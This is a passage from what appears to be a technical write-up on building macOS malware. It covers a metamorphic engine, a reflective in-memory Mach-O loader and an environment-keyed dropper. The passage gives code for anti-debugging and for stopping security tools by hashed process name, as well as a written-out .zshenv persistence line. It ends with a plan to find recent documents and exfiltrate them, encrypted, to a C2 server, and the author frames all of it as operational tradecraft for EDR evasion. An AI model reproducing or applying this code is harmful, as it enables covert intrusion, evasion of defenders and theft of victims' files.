0000000000000d78 T isolator::ImageLoader::link(...)

link() orchestrates the whole thing rebase (fix up internal pointers for ASLR slide), bind (resolve external symbol references), then runInitializers() which calls doModInitFunctions() to execute any __mod_init_func constructors. For us wrapped Mach-Os this is mostly a no-op wrap_macho() produces images with zeroed LC_DYLD_INFO_ONLY (no rebases, no binds, no exports), so the rebase and bind passes walk empty opcode streams and return immediately. But the machinery is there for images that need it.

The dyld_stubs.cpp module ([ReflectiveLoader/loader/src/dyld_stubs.cpp](https://github.com/pwardle/ReflectiveLoader/blob/main/loader/src/dyld_stubs.cpp)) provides the glue that the ImageLoader hierarchy expects from dyld’s runtime environment. In real dyld, the LinkContext structure contains function pointers for image notifications, error reporting, library loading, and symbol resolution. The stubs replace all of these with no-ops:

// dyld_stubs.cpp   all callbacks silenced for OPSEC
void stub_notifySingle(dyld_image_states, const ImageLoader*,
                       ImageLoader::InitializerTimingList*) {}
void stub_notifyBatch(dyld_image_states state, bool preflightOnly) {}
void stub_setErrorStrings(unsigned errorCode, const char*, const char*,
                          const char*) {}
void stub_clearAllDepths() {}
unsigned int stub_imageCount() { return 0; }
void stub_addDynamicReference(ImageLoader*, ImageLoader*) {}

Even dyld::log() and dyld::warn() are empty no diagnostic output, no trace. The throwf() function throws an empty string instead of formatting an error message. The loaded image thinks it’s being managed by dyld. It isn’t.

The ImageLoaderProxy is how the library resolves symbols against the host process. When the loaded image needs a symbol from an already-loaded dylib (say, libSystem.B.dylib), the stub_flatExportFinder callback creates a proxy via ImageLoaderProxy::instantiate() that wraps the real dyld’s view of the process. custom_dlsym uses this to find exported symbols by walking the export trie the same trieWalk() algorithm Apple’s dyld uses:

// custom_dlfcn.cpp
extern "C" void *custom_dlsym(void *__handle, const char *__symbol) {
    std::string underscoredName = "_" + std::string(__symbol);
    const ImageLoader *image = reinterpret_cast<ImageLoader *>(__handle);

    auto sym = image->findExportedSymbol(underscoredName.c_str(), true, &image);
    if (sym != NULL) {
        auto addr = image->getExportedSymbolAddress(
            sym, g_linkContext, nullptr, false, underscoredName.c_str());
        return reinterpret_cast<void *>(addr);
    }
    return nullptr;
}

The underscore prefix is because Mach-O symbols are stored with a leading underscore (_main, _printf). findExportedSymbol walks the export trie a compressed prefix tree in __LINKEDIT that maps symbol names to addresses. For our piece minimal wrapped images the trie is empty, but when loading real dylibs through the proxy, this is how external symbols get resolved.

Then there’s ObjCRuntime.cpp. If the loaded image contains Objective-C metadata class lists in __objc_classlist, category lists in __objc_catlist, selector references in __objc_selrefs the ObjC runtime needs to know about them. The registerObjC() function in custom_dlfcn.cpp handles this by extracting each ObjC section from the loaded image and feeding them to mull::objc::Runtime:

void registerObjC(ImageLoaderMachO *image) {
    mull::objc::Runtime runtime;

    const char *sections[] = {
        "__objc_selrefs", "__objc_classlist", "__objc_classrefs",
        "__objc_superrefs", "__objc_catlist"
    };

    for (const char *name : sections) {
        void *start; size_t size;
        if (image->getSectionContent("__DATA", name, &start, &size))
            /* add to runtime */;
        else if (image->getSectionContent("__DATA_CONST", name, &start, &size))
    }

    runtime.registerSelectors(/* ... */);
    runtime.addClassesFromSection(/* ... */);
    runtime.registerClasses();
    runtime.addCategoriesFromSection(/* ... */);
}

It tries both __DATA and __DATA_CONST segments because Apple moved ObjC metadata to __DATA_CONST in newer toolchains for security (constant sections can be mapped read-only after initialization). Pure-C payload this is unused, but the library supports it because the same loader could inject ObjC-based payloads the PoC in ReflectiveLoader/PoC/ demonstrates exactly this, loading a .dylib that uses Foundation classes.

The whole thing links as a single static library:

LDFLAGS = lib/libloader.a -framework Foundation -framework CoreServices \
          -framework Security -framework IOKit -lobjc -lz

The frameworks are there for the ObjC runtime registration and for APIs the payload uses (persistence via CoreServices, keychain via Security, hardware enumeration via IOKit). -lobjc links the ObjC runtime itself. -lz is for zlib compressed LINKEDIT data in some Mach-O formats.

So when quiet_load() calls custom_dlopen_from_memory(buf, len), we’re running a complete Mach-O loader pipeline header validation via sniffLoadCommands, segment mapping via vm_copy, rebase, bind, ObjC registration, static initializers entirely in userspace, entirely from a memory buffer, with no filesystem interaction and no involvement from the real dyld. The loaded image appears in the process’s virtual address space but not in dyld’s image list.

_dyld_image_count() doesn’t see it. vmmap shows anonymous memory regions, not a named mapping. DYLD_PRINT_LIBRARIES doesn’t log it. For all purposes, the code doesn’t exist as a loaded library it’s just bytes at an address that happen to be executable.

Once loaded, the code runs in a dedicated pthread to isolate it from the main thread’s stack and state:

static void *exec_thread(void *arg) {
    inmem_binary_t *ib = (inmem_binary_t *)arg;
    typedef int (*entry_fn_t)(void);
    entry_fn_t entry = (entry_fn_t)((uint8_t*)ib->base_addr + ib->entry_offset);
    int result = entry();
    return (void*)(intptr_t)result;
}

int inmem_execute(inmem_binary_t *ib) {
    if (!ib || !ib->base_addr) return -1;
    pthread_t thread;
    void *ret_val;
    if (pthread_create(&thread, NULL, exec_thread, ib) != 0) return -1;
    pthread_join(thread, &ret_val);
    return (int)(intptr_t)ret_val;
}

The entry point is calculated as base_addr + entry_offset, where entry_offset came from LC_MAIN in the original binary’s load commands. The cast to a function pointer and the call through it is the moment mutated code becomes live. The separate thread means if the mutated code crashes (bad mutation, edge case in branch fixup), the main thread can catch it via the join return rather than dying.

Where all of this connects into a self-mutating loop. Each generation feeds its output as the next generation’s input:

#define MAX_GEN 8
#define GROWTH  4

for (unsigned g = 0; g < MAX_GEN; g++) {
    aether_rng_t rng;
    aether_rng_init(&rng);

    /* odd=expand, even=reshape */
    size_t gen_max = (g & 1) ? max_sz : cur_sz;
    size_t nsz = aether_mutate(code, cur_sz, gen_max, &rng, 7, passes, vm, vme);
    if (!nsz) break;

    /* Encrypt mutated code */
    derive_next_key(prev_key, g, gen_key, gen_iv);
    size_t enc_len = aes_encrypt(code, cur_sz, gen_key, gen_iv, &encrypted);

    /* Wrap in Mach-O */
    uint8_t *macho = wrap_macho(encrypted, enc_len, &macho_sz);

    /* Reflective load with decryption */
    void *h = quiet_load(macho, (int)macho_sz, gen_key, gen_iv);

    /* Extract __text from loaded image > next generation's input */
    struct section_64 *ns = find_text(macho);
    if (ns && ns->size <= max_sz) {
        memcpy(code, macho + ns->offset, ns->size);
        cur_sz = ns->size;
    }
}

Generation 0 reads the original __text from the binary on disk (via _NSGetExecutablePath + read_self()). The mutation engine transforms it. The result is AES-encrypted with a key derived from the code itself plus runtime entropy (mach_absolute_time() ^ getpid()). The encrypted blob is wrapped in a Mach-O, reflectively loaded (which decrypts it during load), and the decrypted code is extracted back as input for generation 1.

Each generation’s AES key is derived from the previous generation’s key, creating a key chain. Generation 0’s key comes from hashing the original stub code so the key material is tied to the binary’s identity. If someone patches the stub, the key derivation changes, and all subsequent generations fail to decrypt.

We suppresses stdout during loading by redirecting fd 1 to /dev/null:

static void *quiet_load(void *buf, int len,
                        const uint8_t key[AES_KEY_SIZE],
                        const uint8_t iv[AES_IV_SIZE]) {
    /* Decrypt __text in-place before loading */
    if (key && iv) {
        /* ... find __text section, decrypt with AES ... */
    }

    /* Silence any loader output */
    int fd = dup(1), nul = open("/dev/null", O_WRONLY);
    if (nul >= 0) { dup2(nul, 1); close(nul); }

    void *h = custom_dlopen_from_memory(buf, len);

    fflush(stdout);
    if (fd >= 0) { dup2(fd, 1); close(fd); }
    return h;
}

The final piece a custom implementation of dlopen that operates on an in-memory buffer rather than a file path. It processes the Mach-O headers, maps segments with correct permissions, and returns a handle. This bypasses dyld entirely no NSObjectFileImage, no NSLinkModule, no filesystem interaction. The function is declared in ld/custom_dlfcn.h alongside custom_dlsym for symbol resolution from the loaded image.

When the binary is done with a generation’s loaded image, inmem_free tears down both mappings:

void inmem_free(inmem_binary_t *ib) {
    if (!ib) return;
    if (ib->dual_mapped) {
        if (ib->rw_addr)
            vm_deallocate(mach_task_self(), (vm_address_t)ib->rw_addr, ib->size);
        if (ib->base_addr)
            vm_deallocate(mach_task_self(), (vm_address_t)ib->base_addr, ib->size);
    } else {
        if (ib->base_addr)
            vm_deallocate(mach_task_self(), (vm_address_t)ib->base_addr, ib->size);
    }
    free(ib);
}

Both the RW and RX mappings are deallocated separately. vm_deallocate returns the virtual address range to the kernel the physical pages are freed when the last reference drops. For the dual-mapped case, deallocating the RW mapping doesn’t affect the RX mapping (they’re independent virtual entries pointing to shared physical pages), so both must be explicitly freed.

The entire reflective loading chain wrap_macho > inmem_load > inmem_execute never calls open(), write(), rename(), or any filesystem syscall. From the perspective of tools like fs_usage, dtrace with syscall::open*:entry, or Endpoint Security’s ES_EVENT_TYPE_NOTIFY_WRITE, the mutated code doesn’t exist. There’s no file to hash, no code signature to verify, no quarantine attribute to check.

The dual-mapping specifically defeats runtime memory scanners that look for RWX pages. There are no RWX pages. The RW pages contain code but aren’t executable. The RX pages are executable but were never directly written to (from the virtual address perspective). A scanner would need to correlate the two mappings by walking the vm_map entries and checking for shared physical page backing possible in theory via mach_vm_region_recurse, but no production EDR does this today.

After the N-generation completes, double-fork to detach the payload process:

pid_t p1 = fork();
if (p1 > 0) _exit(0);   /* parent exits clean */
setsid();
pid_t p2 = fork();
if (p2 > 0) _exit(0);   /* child exits */
/* grandchild: detached session leader, no controlling terminal */
close(STDIN_FILENO);
close(STDOUT_FILENO);
close(STDERR_FILENO);
payload_run();

The grandchild inherits the final generation’s memory state but has no parent process to trace back to. The original process exited cleanly. The intermediate child exited. The grandchild is a session leader with closed stdio a daemon by the classic Unix def And its __text section looks nothing like what was on disk 8 mutations ago.

Shenanigans

So far, we’ve covered how the engine mutates code and how the reflective loader maps it into memory. What remains is the operational workflow once it reaches a target. The engine executes in three primary the dropper, the mut8 entry, and the payload.

The dropper is the only component that interacts with disk outside of operator control. It is a standalone Mach-O executable containing the AES-encrypted payload within a custom section.

extern unsigned char _foo_start[] __asm__("section$start$__DATA$__rsrc");
extern unsigned char _foo_end[]   __asm__("section$end$__DATA$__rsrc");

The linker stuffs the AES-encrypted payload into __DATA,__rsrc. At runtime, the dropper checks the environment domain suffix, network prefix, sentinel file and runs those through SHA-256 a bunch of times to get the AES key. Then it tries to decrypt the blob. If the magic number (0xfeedfacf) isn’t right wrong env, bad key, corrupted blob it just unlinks itself and quits. Silent, clean, no crashes.

Only the real gets touched [PAUSE] If decryption works, the dropper drops the payload in a temp folder as p.dylib, dlopens it, finds the entry symbol __8d3942b93e489c7a with dlsym, calls it, then cleans up dlclose, delete temp file, delete temp folder, delete itself. Gone. The dropper is disposable scaffolding.

We use the system dlopen here because libloader.a lives in the payload, not the dropper. The entry name looks like a random hex hash on purpose. Nothing matches it in symbol DBs. Only dlsym can see it. That’s it.

The key derivation deserves a shoutout it’s why the dropper can’t run in a sandbox. Target-specific stuff folder GUIDs, registry values gets hashed thousands of times. Wrong machine? Garbage bytes. Fails the magic check. Piece nukes itself.

We do the same thing, but with three factors: domain suffix, network prefix, and a sentinel file. All three have to match.

The operator fills these in at build time based on recon. Stuff like job postings mention the VPN client, DNS records leak the domain, and a quick port scan shows the internal range. The build tool takes those three strings, concatenates them with pipe delimiters, then runs SHA‑256 over the result about 1000 times.

The first 16 bytes become the AES key. The last 16 bytes become the IV.

Why not just use the hardware UUID or something? Because a UUID locks you to a single machine. Domain + network + file lets you target an entire organization. You build one dropper and it works on any machine inside E-Corp’s network that has their VPN client installed.

The TARGET_DOMAIN, TARGET_NETWORK, and TARGET_FILE names don’t mean anything special they’re just there for clarity. In real ops everything would be heavily obfuscated. Those strings get compiled into the dropper with -include at build time.

Of course this has its pros and cons. It’s not a panacea. Matter of fact, treat it like a challenge see if you can get the piece to run or decrypt on your own machine. There are ways. You just have to find them.

Knowing the target profile doesn’t help you decrypt the payload you still need to actually be on the target network, with the right hostname suffix and the sentinel file present.

And if you’re already there… well, you’re the target.

Once the dropper calls __8d3942b93e489c7a, we’re inside the stub. This is where the metamorphic engine kicks in. First thing it does:

int __8d3942b93e489c7a(int argc, char **argv) {
    extern bool harden_check(void);
    if (!harden_check()) return 1;

harden_check() calls deny_attach() then is_debugged().

deny_attach() resolves ptrace via dlsym (symbol XOR’d with 0x11), then calls ptrace(PT_DENY_ATTACH, 0, 0, 0) (syscall 26, request 31). Any debugger that tries to attach after this? SEGV. lldb, dtrace, Instruments all dead. Apple documents it in kernel source, but not in any public API. Same trick every iOS jailbreak detector uses, but we’re on macOS.

is_debugged() checks P_TRACED via sysctl. The sysctl symbol itself is resolved dynamically through dlsym with an XOR key, never linked statically, so nm shows nothing:

static int call_sysctl(int *mib, u_int cnt, void *old, size_t *oldsz) {
    char sym[] = {0x73^0x20, 0x79^0x20, 0x73^0x20, 0x63^0x20,
                  0x74^0x20, 0x6C^0x20, 0};
    for (int i = 0; sym[i]; i++) sym[i] ^= 0x20;
    sysctl_fn fn = (sysctl_fn)dlsym(RTLD_DEFAULT, sym);

If either check fails, we return 1 and the dropper’s cleanup path runs. No self-destruct yet that’s reserved for the payload phase. At this point, nothing’s planted, so the only cleanup needed is the dropper itself, which handles its own deletion.

Before we start sending anything out, we neutralize anything that might catch the traffic. Target list is 13 processes names stored as DJB2 hashes, encrypted with ChaCha20. Key comes from the vault key. I won’t name them so Patrick Wardle doesn’t get mad :)

state[12] = 0; state[13] = 0x48554e54; 

Runtime decrypts the table, enumerates processes via proc_listpids(PROC_ALL_PIDS), hashes each name with DJB2, compares. No process names ever appear in the binary not even encrypted. Just hashes of hashes.

Killing isn’t smart (tell that to the government) launchd just restarts. We check for plists in /Library/LaunchDaemons/ or ~/Library/LaunchAgents/. If present, it’s launchd-managed. Those get SIGSTOP. launchd sees them as “running” (no restart), but they’re frozen. Everything else SIGTERM, wait 100ms, SIGKILL.

After neutralization we verify stopped processes are actually frozen then Decrypted hash table wiped immediately.

For the config strings the usual suspects live in an encrypted vault. Three entries, each ChaCha20 encrypted with per-entry derived keys. Hashes together ChaCha20 sigma constants, the encrypted hunt table blob, all three vault nonces, and the ASLR slide So the idea is That last one is key. ASLR slide changes every execution. So the master key is different every time. Can’t extract the key from a memory dump of one execution and use it on another.

Why ChaCha20 for the vault instead of AES? Cus ChaCha20 is a stream cipher. Decrypt exactly the bytes we need without padding, without block alignment, without a cipher context. Entire decryption is 15 lines with no heap allocation. AES-CBC would need CommonCrypto which means more framework surface. The vault predates the RSA decision and there’s no reason to change it.

Persistence

After mutation and fork, the grandchild gets called. First thing it does is plant itself.

Binary relocates to ~/Library/Caches/.com.apple..<seed>/agent where <seed> is a deterministic hex we get from the machine’s hardware identity (IOPlatformUUID + serial, hashed). Same machine always gets same path. Matters cus cleanup needs to find the binary later without storing the path anywhere.

Why ~/Library/Caches/? User-writable, expected to contain random Apple-looking directories, most backup tools exclude it. Dot prefix hides it in Finder. .com.apple. prefix blends with “legitimate” Apple cache dirs. So doing ls ~/Library/Caches/ you get dozens of .com.apple.* directories and probably won’t notice ours.

Persistence is .zshenv. Not LaunchAgent, not cron, not login items. .zshenv is sourced by zsh on EVERY invocation - interactive, non-interactive, scripts, Terminal.app, iTerm2, SSH, even system() calls from other programs if default shell is zsh (which it is since Catalina). Most reliable persistence on modern macOS without root at least to my dumbass

So Inject [ -z "$(pgrep -xf '/path/to/agent')" ] && (exec {path} &>/dev/null &)

pgrep guard prevents stacking. exec replaces the subshell, &>/dev/null suppresses output, & backgrounds. Sees nothing.

Every string fragment built via volatile stack writes. Compiler cannot fold em into .rodata shi like

char g1[9]; { volatile char *v=(volatile char*)g1;
    v[0]=0x5b; v[1]=0x20; v[2]=0x2d; v[3]=0x7a; v[4]=0x20;
    v[5]=0x22; v[6]=0x24; v[7]=0x28; v[8]=0; }

strings on the binary will never show pgrep, zshenv, exec, or any fragment of the persistence line.

The piece doesn’t do everything at once. Timing model based on a marker file (.ts) storing install timestamp.So first run. Relocate, install .zshenv, write marker, exit. Nothing else. Binary has been on disk for zero seconds of suspicious activity.

then less than 1 hour since install? Exit immediately. We do literally nothing for an hour. After 1 hour we go active. Hunt security tools, load curl via dlopen, decrypt vault, fetch dead-drop. Dead-drop is a pastebin/gist so fetch pubkey, profile host via sysctl (hostname, kernel, model, cpus, ram, user), encrypt with RSA hybrid envelope, POST to C2.

After 2 hours, file collection. Spotlight query for files modified OR opened in last 7 days matching target extensions (pdf, doc, docx, xls, xlsx, csv, ppt, key, pgp). Each file individually packed, zlib compressed, RSA+AES sealed, POSTed to C2 with 30-90s random jitter between files. Five retries with exponential backoff.

Then strip our line from .zshenv, delete binary, rmdir cache dir. Gone you could make this to hide at least a month in the machine this give you implant time to gather as much new and old docs as possible but yeah you do you ..

Exfil Crypto

RSA hybrid envelope we uses Security.framework exclusively. No OpenSSL, no LibreSSL, no dlopen’d libcrypto. I tried the dlopen route first macOS blocks it with “loading libcrypto in an unsafe way” and aborts the process. Apple moved system LibreSSL into the dyld shared cache and added a specific check preventing third-party binaries from loading it. Security.framework has no such restriction cus it’s first-party and already linked.

Envelope works like PGP. Random AES-128 key and IV per file:

CCRandomGenerateBytes(aes_key, 16);
CCRandomGenerateBytes(iv, 16);

Data encrypted with AES-128-CBC via CommonCrypto’s CCCrypt(). Then 32-byte key material (key || IV) encrypted with RSA-OAEP-SHA256 via SecKeyCreateEncryptedData():

CFDataRef ek_cf = SecKeyCreateEncryptedData(key, 
    kSecKeyAlgorithmRSAEncryptionOAEPSHA256, km_data, NULL);

Wire format: [4:ek_len][ek][4:ct_len][ct] - lengths in network byte order. As the Operator’s server holds RSA private key, reverses the process.

Why RSA-2048 not curve25519? Cus Security.framework supports RSA natively with zero additional code.

PEM parser includes custom base64 decoder built on stack. Can’t use SecDecodeTransformCreate() Apple deprecated entire SecTransform API in macOS 13. Can’t use NSData base64 Objective-C runtime overhead. So we decode ourselves, 20 lines, no heap for the decode table.